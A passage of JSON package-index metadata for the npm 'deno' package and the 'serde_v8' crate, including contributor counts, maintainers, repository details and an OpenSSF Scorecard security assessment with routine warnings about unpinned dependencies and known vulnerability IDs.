//issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T16:40:47.643Z","updated_at":"2024-12-12T16:40:47.643Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-21T22:16:10.905Z","updated_at":"2024-12-21T22:16:10.905Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5836603,"maintainers_count":1249644,"namespaces_count":427708,"keywords_count":891347,"github":"npm","metadata":{"funded_packages_count":192785,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-04T05:03:39.333Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":4284831,"name":"serde_v8","ecosystem":"cargo","description":"Rust to V8 serialization and deserialization","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":325,"first_release_published_at":"2021-03-26T02:41:22.775Z","latest_release_published_at":"2026-08-27T15:19:35.634Z","latest_release_number":"0.320.0","last_synced_at":"2026-09-08T04:31:54.318Z","created_at":"2022-04-13T04:14:51.021Z","updated_at":"2026-09-08T22:17:12.785Z","registry_url":"https://crates.io/crates/serde_v8/","install_command":"cargo install serde_v8","documentation_url":"https://docs.rs/serde_v8/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14e